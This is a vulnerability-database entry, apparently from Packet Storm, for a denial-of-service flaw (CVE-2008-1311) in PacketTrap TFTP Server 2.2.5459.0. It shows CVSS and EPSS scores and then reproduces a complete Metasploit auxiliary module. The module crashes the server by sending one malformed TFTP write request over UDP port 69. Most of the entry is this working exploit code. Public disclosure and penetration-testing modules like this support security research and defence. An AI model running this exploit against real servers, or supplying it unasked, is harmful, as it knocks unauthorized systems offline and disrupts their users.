PacketTrap TFTP Server 2.2.5459.0 Denial of Service

2024-08-3100:00:00

Kris Katterjohn, metasploit.com

packetstormsecurity.com

packettrap tftp server

denial of service

vulnerability

write request

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

AI Score

Confidence

Low

EPSS

0.649

Percentile

97.9%

JSON

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Udp  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'PacketTrap TFTP Server 2.2.5459.0 DoS',  
'Description' => %q{  
The PacketTrap TFTP server version 2.2.5459.0 can be  
brought down by sending a special write request.  
},  
'Author' => 'kris katterjohn',  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2008-1311'],  
[ 'OSVDB', '42932'],  
[ 'EDB', '6863']  
],  
'DisclosureDate' => '2008-10-29'))  
  
register_options([Opt::RPORT(69)])  
end  
  
def run  
connect_udp  
print_status("Sending write request...")  
udp_sock.put("\x00\x02|\x00netascii\x00")  
disconnect_udp  
end  
end  
`